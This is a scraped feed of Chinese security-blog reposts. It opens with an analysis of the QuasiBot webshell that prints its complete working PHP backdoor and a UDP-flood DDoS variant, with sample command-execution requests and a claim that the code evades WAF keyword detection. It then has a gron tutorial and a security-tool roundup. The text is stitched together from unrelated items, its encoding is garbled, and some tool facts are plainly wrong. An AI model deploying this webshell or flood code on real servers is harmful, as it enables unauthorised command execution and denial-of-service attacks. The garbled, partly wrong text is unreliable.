最近在想着写一款webshell批量管理工具,发现目前有一款开源的,由php编写的管理平台——"QuasiBot"。在本地使用QuasiBot的时候,发现它的内置后门代码非常不错,所以便有了此文。本文会针对QuasiBot的两种后门代码进行剖析:非DDoS版 和 DDoS版。

二、了解QuasiBot

QuasiBot是一款php编写的webshell管理工具,可以对webshell进行远程批量管理。这个工具超越于普通的webshell管理是因为其还拥有安全扫描、漏洞利用测试等功能,可以帮助渗透测试人员进行高效的测试工作。

更多信息:http://www.freebuf.com/tools/40411.html
项目地址:https://github.com/Smaash/quasibot

批量Webshell管理工具QuasiBot之后门代码分析

三、分析

1. 非DDoS版

首先给出 "非DDoS" 版本的后门代码:

<?php if($_GET['_']) {     print "<!--".$_="{:|";$_=($_^"<").($_^">").($_^"/");${'_'.$_}["_"](${'_'.$_}["__"]);     print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } elseif($_GET['___']) {      @$_GET['___']();  } ?>

格式化一下,显得比较清晰:

<?php if($_GET['_']) {     print "<!--".$_="{:|";     $_=($_^"<").($_^">").($_^"/");     ${'_'.$_}["_"](${'_'.$_}["__"]);     print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } elseif($_GET['___']) {      @$_GET['___']();  } ?>

首先来分析一下代码结果,QuasiBot的后门代码十分简单,由一个 "if…elseif…" 构成。
可以看到 "elseif($_GET['___'])" 直接运行从Get请求过来的参数 "___" 的函数。例如这里后门地址为:"http://www.virtual.com/ma.php",那么构造如下请求就会让后门代码去执行 "phpinfo()" 函数来获取系统的相关信息。

    http://www.virtual.com/ma.php?___=phpinfo

然后再看第一个 "if($_GET['_'])" 部分,当有参数 "__" 传入时进入条件:

<?php if($_GET['_']) {     print "<!--".$_="{:|";     $_=($_^"<").($_^">").($_^"/");     ${'_'.$_}["_"](${'_'.$_}["__"]);     print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } ... ?>

根据代码可以看出,QuasiBot将通过后门执行的输出都放到 "response" 的注释 "<!– … –>" 里去了,这里有一定的隐藏效果。注意这里 "print "<!–".$_="{:|";" 这里对 $_ 变量进行了赋值,然后是通过?#22336;?#30340;异或运算连接起一个 ""GET"" ?#22336;?#20018;:

    $_=($_^"<").($_^">").($_^"/");

"$_^"<"" 会将 $_ 变量的第一个?#22336;?#30340;ascii码与&#039;<&#039;的ascii码 进行异或,也就是 "123"'{'的ascii码) 与 "60"('<'的ascii码)进行异或:

    123^60 ==> 71 ('G')

得到ascii码 "71" 也就是?#22336;?""G"",通过相同方法构造出 ""E"" 和 ""T"",然后将其连接构成?#22336;?#20018; ""GET""。
然后根据php中的一个变量引用特性,以 "${'_GET'}["__"]" 作为参数调用函数 "${'_GET'}["_"]()"。
这里的函数执行涉及到了php中 "动态函数调用" 和 "花括号{}使用" 的trcik。
《常用PHP中花括号使用规则详解》这篇文章比较详细的讲了在php中 "{}" 使用时需要注意的地方。
给出一个简单易懂的例子?#24471;?#19968;下 "动态函数调用",看下面这?#26410;?#30721; "demo.php":

<?php $func = "demo"; function demo() {     echo "Demo on!" } $func(); ?>

这里为了方便,直接在终端使用php执行该脚本文件,执行 "php demo.php" 得到输出 "Demo on!"。
看了这个demo.php再结合 "{}" 的使用就很容易理解后门中的这?#26410;?#30721;: "${'_GET'}["__"](${'_GET'}["_"])" 。
写得明显点就是:"$_GET["_"]($_GET["__"])"。
简单明了的QuasiBot非DDoS后门代码:

<?php if($_GET['_']) {     print "<!--{:|";     $_GET["_"]($_GET["__"]);     print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } elseif($_GET['___']) {      @$_GET['___']();  } ?>

例如在win下要执行 "system'dir')",后门url为:http://www.virtual.com/ma.php,那么请求:http://www.virtual.com/ma.php?_=system&__=dir

在返回页面的源码里,得到如下内容:

    <!--{:| 驱动器 D 中的卷没有标签。      卷的序列号是 2EE6-3EE0      D:/PhpStudy/WWW 的目录     2014/12/03  21:05    <DIR>          .     2014/12/03  21:05    <DIR>          ..     2014/12/03  21:05    <DIR>          discuz     2014/11/10  22:43    <DIR>          Documentation     2014/11/22  02:13               431 function.php     2014/12/04  17:37               226 ma.php     2014/11/19  22:38    <DIR>          mybb     2014/11/20  12:53    <DIR>          mybb1     2014/10/21  17:11    <DIR>          phpMyAdmin     2014/11/25  23:52    <DIR>          phpMyRecipes     2014/11/25  14:59    <DIR>          phpok     2014/11/15  11:36    <DIR>          piwigo     2014/11/14  14:04    <DIR>          qibomenhu     2014/11/26  08:55    <DIR>          quasibot     2014/11/27  11:50    <DIR>          rocboss     2014/11/21  00:25    <DIR>          sqli     2014/11/14  15:59    <DIR>          thinksns     2014/11/10  22:43    <DIR>          Tools     2014/11/10  22:44    <DIR>          upload     2014/12/03  19:36               256 upload.php     2014/11/22  12:54    <DIR>          wordpress                    3 个文件            913 字节                   18 个目录 35,217,747,968 可用字节     {:|7d9f82db8d7d8b1ed3fda323040e671a{:|WINNT{:|-->

命令成功执行,其他比较细节的分析这里就不在多说了,?#34892;?#36259;的可以自行总结。

??2. DDoS版??
DDoS版后门代码如下(代码有点长):

<?php if($_GET['_']) { print "<!--".$_="{:|";$_=($_^"<").($_^">").($_^"/");${'_'.$_}["_"](${'_'.$_}["__"]); print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } elseif($_GET['___']) { @$_GET['___'](); } elseif(isset($_POST['target'])&&isset($_POST['time'])){$fn0=0;$pm1=$_POST['time'];$yu2=time();$az3=$yu2+$pm1;$jd4=$_POST['target'];$kb5=gethostbyname($jd4);for($pt6=0;$pt6<65553;$pt6++){$yf7.='X';}while(1){$fn0++;if(time()>$az3){break;}$yw8=rand(1,65553);$vl9=fsockopen('udp://'.$kb5,$yw8,$ic10,$yf11,5);if($vl9){fwrite($vl9,$yf7);fclose($vl9);}}}elseif($_POST['kill']=='1'){exit(0);} ?>

格式化一下:

<?php if($_GET['_']) {     print "<!--".$_="{:|";$_=($_^"<").($_^">").($_^"/");${'_'.$_}["_"](${'_'.$_}["__"]);     print "{:|".md5("666".date("h:d"))."{:|".PHP_OS."{:|-->"; } elseif($_GET['___') {     @$_GET['___'](); } elseif(isset($_POST['target'])&&isset($_POST['time'])) {      $fn0=0;     $pm1=$_POST['time'];     $yu2=time();     $az3=$yu2+$pm1;     $jd4=$_POST['target'];     $kb5=gethostbyname($jd4);     for($pt6=0;$pt6<65553;$pt6++) {         $yf7.='X';     }     while(1) {         $fn0++;         if(time()>$az3) {             break;         }         $yw8=rand(1,65553);         $vl9=fsockopen('udp://'.$kb5,$yw8,$ic10,$yf11,5);         if($vl9) {             fwrite($vl9,$yf7);             fclose($vl9);         }     } } elseif($_POST['kill']=='1') {     exit(0); } ?>

前面部分的参数判断这里就不讲解了,请参照"非DDoS版"的分析。直接看DDoS代码部分,这里通过 "$_POST['target']" 来获取目标,"$_POST['time']" 为攻击?#20013;?#30340;时间(这里以秒为单位)。
接下来就是一系列的准备工作,构造 "65553" 字节的超长数据通过 "udp" 的方式向目标随机端口打流量(为哈要随机端口,没懂)。
构造 "65553" 字节的数据:

    for($pt6=0;$pt6<65553;$pt6++) {         $yf7.='X';     }

随机生成端口号(最大不应该是65535?):
    $yw8=rand(1,65553);
创建socket并发送数据:

    $vl9=fsockopen('udp://'.$kb5,$yw8,$ic10,$yf11,5);     if($vl9) {         fwrite($vl9,$yf7);         fclose($vl9);     }

至此 "QuasiBot" 两种模式的后面简单剖析完毕。值得学习的是该后门代码对php特性的运用,整个后门代码("非DDoS版")没有出现任何较敏感的关键字,能绕过大多数通过关键字检测的waf(未验证,目测。不要拍砖)。

其中DDoS部分,没太明白为何是随机端口发送,?#20013;?#36319;进下。

[本文作者RickGray,FreeBuf独家发布文章,未经许可禁止转载]

]]>
http://www.aycelz.tw/1259.html/feed 0
GRON:一款让使JSON可以Grep的工具 http://www.aycelz.tw/1257.html http://www.aycelz.tw/1257.html#respond Wed, 10 Jan 2018 02:14:23 +0000 http://www.aycelz.tw/1257.html

今天给大家介绍一款名叫gron的JSON数据检索工具,gron不仅可以将目标JSON数据进行离散化拆分,并能够让用户更加轻松地使用grep来对数据进行搜索,而且它还能够允许用户查看到数据的绝对路径。

GRON:一款让使JSON可以Grep的工具

工具下载

下载地址:【GitHub传送门

使用样例

gron的使用样例如下:

?gron "https://api.github.com/repos/tomnomnom/gron/commits?per_page=1"| fgrep "commit.author" json[0].commit.author= {}; json[0].commit.author.date= "2016-07-02T10:51:21Z"; json[0].commit.author.email= "mail@tomnomnom.com"; json[0].commit.author.name= "Tom Hudson";

gron还可以逆向工作,即它能够将你所提供的数据转换成JSON格式:

?gron "https://api.github.com/repos/tomnomnom/gron/commits?per_page=1"| fgrep "commit.author" | gron --ungron [ { "commit": { "author": { "date":"2016-07-02T10:51:21Z", "email":"mail@tomnomnom.com", "name": "TomHudson" } } } ]

工具安装

gron的使用不需要任何的运行时依赖,你可以直接从gron的Github库【传送门】中下载针对不同操作系统的代码版本,目前该工具支持Linux、Mac、Windows或FreeBSD等平台。你可以直接将项目代码拷贝到自己的执行路径(例如$PATH或/usr/bin)中,以方便使用:

?tar xzf gron-linux-amd64-0.1.5.tgz ?sudo mv gron /usr/bin/

如果你使用的是macOS,你还可以通过brew来安装gron:

?brew install gron

或者说,如果你使用Go,你还可以使用go get命令来完成gron的安装(Go v1.7或更高版本):

? go get -u github.com/tomnomnom/gron

工具使用

从文件中读取JSON数据:

?gron testdata/two.json json= {}; json.contact= {}; json.contact.email= "mail@tomnomnom.com"; json.contact.twitter= "@TomNomNom"; json.github= "https://github.com/tomnomnom/"; json.likes= []; json.likes[0]= "code"; json.likes[1]= "cheese"; json.likes[2]= "meat"; json.name= "Tom";

从URL?#35797;?#33719;取JSON数据:

?gron http://headers.jsontest.com/ json= {}; json.Host= "headers.jsontest.com"; json["User-Agent"]= "gron/0.1"; json["X-Cloud-Trace-Context"]= "6917a823919477919dbc1523584ba25d/11970839830843610056";

从stdin获取JSON数据:

?curl -s http://headers.jsontest.com/ | gron json= {}; json.Accept= "*/*"; json.Host= "headers.jsontest.com"; json["User-Agent"]= "curl/7.43.0"; json["X-Cloud-Trace-Context"]= "c70f7bf26661c67d0b9f2cde6f295319/13941186890243645147";

使用grep命令搜索目标数据并查看路径:

?gron testdata/two.json | grep twitter json.contact.twitter= "@TomNomNom";

gron还可以结合diff命令一起使用:

?diff <(gron two.json) <(gron two-b.json) 3c3 <json.contact.email = "mail@tomnomnom.com"; --- >json.contact.email = "contact@tomnomnom.com";

gron的输出为?#34892;?#30340;JavaScript:

?gron testdata/two.json > tmp.js ?echo "console.log(json);" >> tmp.js ?nodejs tmp.js {contact: { email: 'mail@tomnomnom.com', twitter: '@TomNomNom' }, github: 'https://github.com/tomnomnom/', likes: [ 'code', 'cheese', 'meat' ], name: 'Tom' }

Ungronning

gron还可以将它的输出数据转换为JSON格式:

?gron testdata/two.json | gron -u{ "contact": { "email":"mail@tomnomnom.com", "twitter": "@TomNomNom" }, "github":"https://github.com/tomnomnom/", "likes": [ "code", "cheese", "meat" ], "name": "Tom" }

这也就意味着,你可以使用gron配合grep以及其他的工具来修改JSON数据:

?gron testdata/two.json | grep likes | gron --ungron { "likes": [ "code", "cheese", "meat" ] }

在保存数组键值时,如果值为空的话,gron将会以“null“填充数组:

?gron testdata/two.json | grep likes | grep -v cheese json.likes= []; json.likes[0]= "code"; json.likes[2]= "meat"; ?gron testdata/two.json | grep likes | grep -v cheese | gron --ungron { "likes": [ "code", null, "meat" ] }

关于gron的高级使用?#35760;桑?#35831;参考【这篇文档】。

获取帮助信息

?gron --help TransformJSON (from a file, URL, or stdin) into discrete assignments to make itgreppable Usage: gron [OPTIONS] [FILE|URL|-] Options: -u, --ungron     Reverse the operation (turn assignmentsback into JSON) -c, --colorize   Colorize output (default on tty) -m, --monochrome Monochrome (don't colorizeoutput) -s, --stream     Treat each line of input as a separateJSON object -k, --insecure   Disable certificate validation --no-sort    Don't sort output (faster) --version    Print version information ExitCodes: 0  OK 1  Failedto open file 2  Failedto read input 3  Failedto form statements 4  Failedto fetch URL 5  Failedto parse statements 6  Failedto encode JSON Examples: gron /tmp/apiresponse.json gron http://jsonplaceholder.typicode.com/users/1 curl -shttp://jsonplaceholder.typicode.com/users/1 | gron gronhttp://jsonplaceholder.typicode.com/users/1 | grep company | gron –ungron

* 参考来源:gron,FB小编Alpha_h4ck编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1257.html/feed 0
年度盘点 | 安全测试者偏爱的安全测试工具 http://www.aycelz.tw/1255.html http://www.aycelz.tw/1255.html#respond Tue, 09 Jan 2018 02:11:28 +0000 http://www.aycelz.tw/1255.html

国外网站 Concise Courses 总结了安全测试者常用且好用的安全测试工具,本文摘录并分类整理列举一二,供安全从业者与爱好者参考。

年度盘点 | 安全测试者偏爱的安全测试工具

无线类

1. Metasploit (免费)

2003年,美国网络安全研究员兼开发者 Moore 启动了 Metasploit 项目,目的是创建一个开源平台,获取 Exploit 代码用于研究与开发。随后,Metasploit 框架得以开发与发展,目前已经成为广泛用于渗透测试和研究的开源漏洞利用框架。2009 年,Metasploit 被 Rapid7 公司?#23637;海?#20294;直到 2013 年,仍然由 HD 管理。Metasploit 的受?#38431;?#31243;度无需细说,这个框架已经?#29615;?#35793;成数十种语言,基本每个安全从业者都对此有所了解和研究。

Metasploit 原框架是免费的,但 Rapid 7 ?#23637;?#20043;后,新的 Metasploit Pro 和 Metasploit Express 版本都需要收?#36873;?#24403;然,后两者的功能也更丰富,能够为?#34892;?#20225;业和企业级组织提供安全项目和高级渗透测试等完整安全解决方?#31119;?#22312; IT 安全审计中也广泛使用。所有的 Metasploit 版本都可在 Unix(包括Linux和Mac OS X)和 Windows 上运行。

 年度盘点 | 安全测试者偏爱的安全测试工具

Metasploit 主要有五大用途:

A.选择和配置漏洞利用代码,可以为 Windows,Unix / Linux 和 Mac OS X 系统提供近 1000 个漏洞

B.检查目标

C. 选择并配置要发送到目标的?#34892;?#36733;荷(如远程外壳或VNC服务器)。

D. 绕过IDS / IPS系统(Intruston检测系统)

E. 执行利用

2. Wifiphisher(免费)

Wifiphisher 可以对无线 WiFi网络执行快速的自动钓鱼测试,借以发现账户和密码凭据。Wifiphisher 的特色在于它使用了社交工程攻击,其主要利用过程为:Wifiphisher 从用户合法的 AP 中取消用户的身份验证,再让用户验证实现攻击所必须的 Evil Twin AP。随后, Wifiphisher 将通过代理向用户提供一个 HTML 网?#24120;?#36890;知用户固件升级已经完成,并要求用户再次进行认证。在这个过程中,用户的无线密码就已经泄露,而用户则会毫不知情,继续浏览网页。

Wifiphisher 完全免费,可以从 GitHub 下载,支持 Kali Linux 系统,目前有一些用户?#37096;?#22312;其他平台上使用这款工具,但还是 Linux 最安全。

当然,要想实现成功利用,用户还需要配置支持“接入点?#20445;ˋP)模式、且能够在“监视器模式”下执行注入攻击的无线网络适配器。?#36865;猓?#35774;?#30422;?#21160;也应该支持网络连接。

更多详情可参考 FreeBuf 之前发布的相关文章

年度盘点 | 安全测试者偏爱的安全测试工具

密码?#24179;?#31867;

1. John the Ripper (免费)

John The Ripper 算是很有名的密码?#24179;猓?#40657;客)工具了。除了名字炫酷,John the Ripper 使用效果也很好,与 Metasploit 同属于 Rapid7 家族。

在密码分析中,密码?#24179;?#20027;要是指从计算机系统或网络中存储或已经传输的数据中?#25351;?#25110;窃取密码的过程。最常见的密码?#24179;?#26041;式就是“暴力?#24179;狻保?#20063;就是计算机系统通过交叉检查密码的可用?#29992;?#21704;希来猜测正确密码。而在明文密码中,“暴力?#24179;狻?#21017;演变自?#30333;值?#25915;击”。如果被猜测的密码有哈希值,那么密码?#24179;?#33719;得的就是?#23433;?#34425;”表。这些过程已是众所周知。而 John The Ripper 的优势在于,可以离线?#24179;?#23494;码。

年度盘点 | 安全测试者偏爱的安全测试工具

John the Ripper 既有免费版本又有收费的?#21543;?#19994;版本”。对密码?#24179;?#29305;定操作系统?#34892;?#36259;的渗透测试人员一般都会使用商业版本,其性能和速度都有所优化。对于普通用户而言,开源免费版本的 John The Ripper 也够用。核心用户还可以在 Rapid7 官网获取 Pro 版本。

John The Ripper 最初基于 Unix 系统开发,现在可各种平台上运行。这些平台中有 11 个是 DOS、Unix、BeOS、Win32 和 OpenVMS 的架构特定版本。

2. THC Hydra (免费)

THC Hydra 的知名程度也不需细说。使用 THC Hydra 可以对五十多种协议执行非常快速的?#20540;?#25915;击。THC Hydra 主要通过 PoC 代码实现,可轻松添?#26377;?#27169;块,让远程系统轻易获得未经授权的访问。其特点是快速高效,但需要稳定的网络环?#24120;?#21482;能在线使用,可将?#20540;?#25915;击和暴力?#24179;?#32467;?#24076;?#22312;登?#23478;?#38754;尝试各种密码和登录组合。

THC Hydra 可免费使用,在Linux,Windows / Cygwin,Solaris,FreeBSD / OpenBSD,QNX(黑莓10)和OSX上?#23478;?#32463;进行测试。

年度盘点 | 安全测试者偏爱的安全测试工具

3. Aircrack (免费)

Aircrack-ng 由数据包嗅探器、检测器、WPA / WPA2-PSK 解密器、WEP 和用于 802.11 无线局域网的分析工具组成。Aircrack-ng 支持无线网络接口控制器,驱动程序支持原始监控模式,可以嗅探 802.11a、802.11b 和 802.11g 流量。从 0.9 版?#31350;?#22987;,Aircracl-ng 套件中就包含了由达姆施塔特理工大学某研究小组制作的新攻击向量“PTW?#20445;?#21487;以减少解密 WEP 密钥所需初始化向量(IV)的数量。Aircrack-ng 的重点是无线安全领域。主要功能包括监视捕获数据包,将数据导出到文本文件供第三方工具处理;重复攻击;伪造接入点;使用数据包注入解除身份验证;通过捕获和注入来测试WiFi卡和驱动程序功能;?#24179;?WPA 和 WPA PSK(WPA 1和WPA 2)。 

Aircrack-ng 可免费使用,网上有很多相关教程,其安装教程可以看这里

Aircrack-ng 可以在 FreeBSD、OSX、Wubdows、OpenBSD 和 Linux 等多平台上运行,其 Linux 版本已经打包为 OpenWrt 版本,并转移到 Maemo、Zaurus 和 Android 平。目前,iPhone ?#37096;?#25918;了 Aircrack-ng 的PoC 端口。

年度盘点 | 安全测试者偏爱的安全测试工具

端口扫描类

1. Nmap (免费) 

Nmap 的威力很多安全测试者都领略过。Nmap 是 Network Mapper 的缩写。Nmap 可以检查原始 IP 数据包、获取网络上可用的主机(服务器信息;了解主机正在使用的服务(应用程序名称和版本)、操作系统(包括操作系统版本和可能的修补程序)以及目标正在使用的数据包过?#20284;?防火墙类型和版本。就连 Metasploit 也要借助 Nmap 进行网络发现和安全审计。

?#36865;猓?#38656;要注意的是,Nmap 还有个 GUI 版本的 Zenmap。安全测试中在进行渗透测试时,可以直接使用 Zenmap,因为它可以预先加载所有命令行,不必在命令终端上输入并运行 “nmap”来加载命令帮助提示。

年度盘点 | 安全测试者偏爱的安全测试工具

Nmap 完全免费,适用于所有主流计算机操作系统。其官方二进制包可用于 Linux、Windows、Mac OS X 和 AmigaOS。使用 Kali Linux 或 BackBox 可进行 Nmap 的快速安装,因为二者随 Nmap 一起提供,便于轻松更新程序。

2. NetScanTools (免费)

NetScanTools 是一个不同测试工具的集?#24076;?#26377;助于进行互联网信息收集和网络?#25910;?#25490;除。使用者可以利用 NetScanTools 自动研究 IPv4 和 IPv6 的地址、域名、主机名、电子邮件地址和 URL。这些自动化工具可由用户自主启动,也就是说,用户可以同时使用几种工具来进行研究,然后结果将显示在 Web 浏览器中。对于网络工程、网络安全、网络管理、网络培训、或网络犯罪调查工作人员来说,NetScanTools 很有用。

NetScanTools 有免费版本也有商业版本,只在 Microsoft Windows 操作系统上运行。

年度盘点 | 安全测试者偏爱的安全测试工具

Web 漏洞扫描类

1. Burp Suite (免费)

FreeBuf 有一系列关于 Burp Suite 的文章和公开?#21361;?#21463;到很多人的?#38431;?/p>

Burp Suite 其实是一个平台,包含不同类型的工具,相互间?#34892;?#22810;接口,连接便利,能加快渗透应用程序的进程。不同的工具共享相同的框架,用于显示和处理 HTTP 消息、身份验证、耐久性、日志记录、警报、代理和可扩展性。更多详情可以进入 FreeBuf 公开课查看学?#21834;?/p>

Burp Suite 需要付费,但也有免费试用版可以使用,适用于 Linux、MAC OS X 和 Windows 操作系统。

年度盘点 | 安全测试者偏爱的安全测试工具

2. Nikto (免费)

Nikto 是一个开放源代码的 Web 服务器扫描程序,可以在 Web 服务器?#29616;?#34892;超过 6700 个潜在危险文件和程序的测试。?#37096;?#22312;超过 2700 台服务器上检查 1250 多个旧服务器的版本和特定的版本问题。?#36865;猓琋ikto 还可检查服务器配置项目(如多个索引文件、HTTP 服务器选项等),还能尝试识别已安装的软件和 Web 服务器。其插件和扫描项目经常可以自动更新。

其具体功能包括 SSL 支持;完整的 HTTP 代理支持;检查过时的服务器组件;以XML、HTML、CSV 或 NBE 等各种格式保存报告;通过使用模板引擎轻松自定义报告;通过输入文件在服务器或多服务器上扫描多个端口;识别通过头文件、文件和图标识别安装的软件;使用 NTLM 和 Basic 进行主机验证;检查常见的“parking?#38381;?#28857;;在特定时间自动暂停等?#21462;?/span>

年度盘点 | 安全测试者偏爱的安全测试工具

虽然 Nikto 并不可隐藏踪迹,却可以在尽可能快的时间内测试网络服务器,还能支持 LibWhisker 的反 IDS方法。

其实,并非所有的检查都是为了查找安全问题。但是安全工程师和网站管理员有时不知道他们的服务器上存在“仅检查信息”类型的检查。而通过使用 Nikto,这些“信息类型”的检查会在打印出的信息中标记出来,还能扫描到另一些针对日志文件中未知项目的检查。

Nikto 可免费使用。由于 Nikto 基于 perl,因此只在大多数安装了 Perl 翻译器的系统上运行。

?#29992;?#31867;

1. Gnupg PGP(免费)

GnuPG(也叫 PGP)是 Phil Zimmerman 编写的?#29992;?#31995;统,只能通过命令行控制运行,有成千上万的安全专家使用。能帮助用户?#29992;堋?#31614;署数据与通信信息,保护数据免受风险。GnuPG 还附带一个?#34892;?#30340;密钥管理系统,可管理所有类型的公共密钥目录。?#36865;猓珿NuPG 可与 S / MIME 和Secure Shell(ssh)等多个应用程序一起使用。

GnuPG 也被视为 PGP 标准的开源实例,是 OpenPGP(也被称为 RFC4880 或 PGP)的免费版本,可在 Linux、Microsoft Windows 和 Mac OS X 上运行。

年度盘点 | 安全测试者偏爱的安全测试工具

2. Keepass(免费)

Keepass 是一款开源的密码管理器,支?#25351;嘸都用?#26631;准和Twofish算法,可以存储多个密码,并使用一个主密码解锁。也就是说,只需要记住一个强密码,就能记住不同账户的不同密码。使用 keepass,还能在网页表单中自动填写密码。Keepass 使用时不需要安装,因此可以用 USB 等设?#24863;?#24102;,非常方便。?#36865;猓琄eepass 还能将数据库从一台计算机传输到另一台计算机,并帮助用户生成强密码。

年度盘点 | 安全测试者偏爱的安全测试工具

3. Openvpn (免费)

OpenVPN 是由 OpenVPN Technologies 开发的工具,遵循传统 VPN 原则,下载量超过 300 万次,可以让同行使用共享的密钥、用户名、密码或证书相互验证。如果用户在多客户端服务器配置环境中使用 Openvpn,则将允许服务器为每个客户端发布身份验证证书。 该工具还为用户提供了一个可扩展框架,旨在简化特定于站点的定制。

OpenVPN 软件免费,能在 Linux、Windows 和 MAC OS X 系统上运行,?#37096;?#22312;手机端使用。

年度盘点 | 安全测试者偏爱的安全测试工具

防火墙类

1. Netfilter (免费)

Netfilter 是一款经典的防火墙渗透测试工具,其核心用途是在 Linux 2.4.x 及更高版本内核中过滤数据包、网络地址、端口、(NA [P] T协议内的)转译内容和其他数据包审计。Netfilter 相当于 Linux 内核中的一系列 hook,可以让内核模块在网络堆栈中执行回调函数。然后回调网络堆栈内遍历相应 hook 的每个包内注册的回调函数。

Netfilter 涉及到 iptables,iptables 是一个用于定义规则集的通用表结构。 IP 表中的每个规则由多个分类器(iptables matches)和一个连接的动作(iptables target)组成。 Netfilter、ip_tables、连接跟踪(ip_conntrack,nf_conntrack)和 NAT 子系统共同构建起 Netfilter 框架。

Netfilter 可免费试用,但是只适用于 Linux 系统。

年度盘点 | 安全测试者偏爱的安全测试工具

2. OpenBSD PF (免费)

OpenBSD PF 可用于过滤 TCP/IP 流量并运行 Network Address Translation,还能对 TCP/IP 流量进行规范化和调整,并提供带宽控制和数据包优化。OpenBSD PF 还可实?#30452;?#21160;操作系统检测等功能。

OpenBSD 3.0 版本之后,包过滤已经成为“GENERIC OpenBSD 内核”的一部分。以前的 OpenBSD 内核版本附带不同的防火墙/ NAT,但现在的版本已经不再支持这个功能。

OpenBSD PF 完全免费,只适用于Linux操作系统。

年度盘点 | 安全测试者偏爱的安全测试工具

入侵检测类

1. OSSIM(免费)

OSSIM 有助于安全从业者处理 SIEM 相关的问题:事件收集、规范化和事件关联?#21462;?span style="font-size: 16px;">OSSIM 主要用于对一系列工具进行汇编。这些工具如果联合使用,可以让安全管理员和网络管理员详细了解主机、物理访问设备、网络和服务器的各个方面。事实?#24076;琌SSIM 包含 OSSEC HIDS 和 Nagios 等多个工具的功能。由于 OSSIM 由安全工程师开发,所以也融入了安全专业人员的实际经验:如果没有采取安全可视化所必须的基本安全控制,SIEM 就是无效的。在这种理念的指导下,OSSIM 更加有用、?#34892;А?/span>

OSSIM 可免费使用,仅适用于Linux操作系统。

年度盘点 | 安全测试者偏爱的安全测试工具

2. OSSEC HIDS (免费)

OSSEC HIDS 基于可扩展且开源的主机,是一个多平台入侵检测系统,具有强大的关联能力和分析引擎功能,可以实现完整性检查、日志分析、基于时间的警报、日志分析和主动响应。OSSEC HIDS 通常用作 SEM/SIM 解决方?#31119;?#19988;由于其强大的日志分析引擎功能,许多大学、ISP 提供商和公司都在使用 OSSEC HIDS 监视和分析其 IDS、防火墙、身份验证日志和 Web 服务器。

OSSEC HIDS 可免费使用,适用于大多数操作系统,包括 Linux、MacOS、Solaris、HP-UX、AIX 和 Windows。

年度盘点 | 安全测试者偏爱的安全测试工具

Debugger 类

1. GDB:GNU Project Debugger  (免费)

GDB(GNU project Debugger)允许用户审核并发现运行中的 web 应用或程序(软件)所执行的内容。GDB 可以帮助开发人员或程序员查找他们所开发的应用或程序?#35272;?#30340;原因,也有助于检测代码中是否存在漏洞。GDB 主要有四大用途:检测程序启动时的状况,详细检测可能影响程序运行的任何事情;检测在特定的阶段或特定的时间停止程序时的状况;研究并解?#32479;?#24207;停止正常工作的原因;改变程序中的内容,便于修复 bug。

GDB 是符合 GNU 通用公共许可证的免费工具,?#20197;?DBX 调试器之后建模,可在许多类 Unix 系统上运行,适用于包括 C、C ++、Ada、Free Pascal、Fortan、Java 等在内的多?#30452;?#31243;语言。

年度盘点 | 安全测试者偏爱的安全测试工具

2. IDA Pro (免费)

IDA 是一个多平台(包括 Linux)多处理器反汇编程序及调试工具,经常被程序员和开发人员用于调试应用程序、评估不正常运行的代码。?#36865;猓琁DA Pro 可帮助用户分析可能存在的漏洞。IDA Pro 相当于多目标反汇编器和多目标调试器。其中,多目标反汇编器是一个针对大量处理器的反汇编模块,具?#22411;?#25972;的可扩展性和交互性,并且尽可能接近高?#23545;?#20195;码。而多目标调试器是一个调试器,可以针对反汇编器收集的数据进行动态分析,还具备调试器的完整功能。IDA Pro 的开发者表示,“IDA 反汇编程序尽可能地接近原始源代码?#20445;?#22240;此广受?#38431;?/p>

IDA Pro 最新完整版本是商业版本,需要收费,?#36824;?#20854;早期的低配版本(版本 5.0 及以下)可以免费下载,所有版本适用于 Windows,Linux 和 macOS X 操作系统。

年度盘点 | 安全测试者偏爱的安全测试工具

3. Immunity Debugger (免费)

Immunity CANVAS 测试工具可用于测试系统是否安全。这个工具附带特意设计的漏洞利用模块,可用于发现 exploit。Immunity CANVAS 可帮助企业具体了解其系统安全概况。

具体来说,Immunity Debugger 可用于分析恶意软件,编写 exploit 和逆向工程的二进制文件。这个工具建立在一个包括函数图形的可靠用户界面?#24076;?#26159;?#21040;?#31532;一个只用于堆创建的分析工具。?#36865;猓琁mmunity Debugger 还是 Python API,易于扩展。

Immunity Debugger 支持所有 Windows 操作系统。

年度盘点 | 安全测试者偏爱的安全测试工具

4. OllyDbg (免费)

OllyDbg 是一个可以分析调试器的 32 位汇编器。由于采用二进制代码分析,因此在源不可用的情况下,使用 OllyDbg 分析就很有用。OllyDbg 拥有?#24049;?#30340;用户界面,具有追踪寄存器、循环、进程、API 调用以及高?#27934;?#30721;分析功能,能够识别程序、开关语句、表格、常量和?#22336;?#20018;等,还能用于调试 DLL。 OllyDbg 还能调试多线程应用程序,并可以添加到正在运行的程序中。OllyDbg 完全支持 Unicode,并动态识别 ASCII 和 Unicode ?#22336;?#20018;。

OllyDbg 的所有官方版本都是免费的,但源代码并未公开。它只适用于 Windows 系统,且不可在 Win32s 上运行。

年度盘点 | 安全测试者偏爱的安全测试工具

5. WinDbg (免费) 

WinDbg 与 OllyDbg 类似,是微软发布的 Windows 多用途调试器。WinDbg 基于 GUI 应用程序运行,主要可在 Windows 操作系统遇到?#35272;?#25110;其他“蓝?#20102;?#26426;”的情况下调试内存转储,?#37096;?#29992;于调试用户模式的应用程序、驱动程序和操作系统本身(内核模式下调试),还能够通过匹配各种条件(例如,时间戳、CRC、单个甚至多处理器版本),从服务器自动加载调试符号文件(例如 PDB 文件)。

WinDbg 所有官方版本都是免费的,只适用于 Windows 操作系统。值得注意的是,许多 WinDbg 用户也倾向于使用 Visual Studio 调试器。 

年度盘点 | 安全测试者偏爱的安全测试工具

应用扫描工具

1. NTBScan (免费)

NTBScan 需要命令行控制运行,扫描本地或远程 TCP/IP 网络上打开的 NETBIOS 域名服务器。 NBTScan 基于标准 Windows 工具 nbtstat 的功能和处理结构,但是可以在大部分 IP 地址上运行。NTBScan 的作者表示,由于以前的类似工具只能在 Windows 平台上运行,所以就开发了 NBTScan,便于在多个主流平台上运行。

